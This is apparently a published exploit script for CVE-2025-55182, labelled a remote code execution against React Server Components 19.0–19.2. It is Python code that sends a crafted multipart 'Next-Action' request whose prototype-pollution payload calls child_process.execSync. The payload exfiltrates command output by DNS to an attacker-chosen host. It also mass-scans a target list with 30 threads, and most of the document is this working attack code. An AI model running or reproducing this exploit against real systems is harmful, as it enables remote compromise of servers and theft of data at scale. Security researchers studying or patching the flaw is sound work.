# Exploit Title: React Server 19.2.0 - Remote Code Execution # Date: 2025-12-05 # Exploit Author: [EynaExp] (https://github.com/EynaExp) # Vendor Homepage: https://react.dev # Software Link: https://react.dev/reference/rsc/server-components # Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0] # Tested on: Windows,Linux # CVE : CVE-2025-55182 import requests import urllib3 from concurrent.futures import ThreadPoolExecutor, as_completed import argparse urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Color definitions class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' END = '\033[0m' print(""" ███████╗██╗ ██╗███╗ ██╗ █████╗ ███████╗██╗ ██╗██████╗ ██╔════╝╚██╗ ██╔╝████╗ ██║██╔══██╗██╔════╝╚██╗██╔╝██╔══██╗ ██║ ╚████╔╝ ██╔██╗ ██║███████║█████╗ ╚███╔╝ ██████╔╝ ██║ ╚██╔╝ ██║╚██╗██║██╔══██║██╔══╝ ██╔██╗ ██╔═══╝ ╚███████╗ ██║ ██║ ╚████║██║ ██║███████╗██╔╝ ██╗██║ ╚══════╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ CVE-2025-55182 Proof of Concept by EynaExp GitHub: https://github.com/EynaExp """) print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}") class NoUsageParser(argparse.ArgumentParser): def error(self, message): # completely suppress argparse usage print(f"Error: {message}") raise SystemExit(1) parser = NoUsageParser(description="EynaExp Scanner") parser.add_argument('-d', required=True) parser.add_argument('-l', required=True) parser.add_argument('-c', required=True) print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] \n[-l] \n[-C] {Colors.END}\n") args = parser.parse_args() dns_endpoint = args.d.strip() targets_file_path = args.l.strip() CMD = args.c.strip() headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Next-Action": "x", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" } request_body = ( "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" "Content-Disposition: form-data; name=\"0\"\r\n\r\n" "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1," "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\"," "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\"," "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n" "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n" "Content-Disposition: form-data; name=\"1\"\r\n\r\n" "\"$@0\"\r\n" "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n" ) def send_request(target_url): try: response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False) result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}" for header_key in ["x-action", "next-action", "rsc"]: if header_key in response.headers: result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}" return result_message except Exception as exception: return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}" with open(targets_file_path) as file_handle: target_urls = [line.strip() for line in file_handle if line.strip()] print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets — starting multi-thread scan...{Colors.END}\n") with ThreadPoolExecutor(max_workers=30) as executor: futures = {executor.submit(send_request, url): url for url in target_urls} for future in as_completed(futures): print(future.result())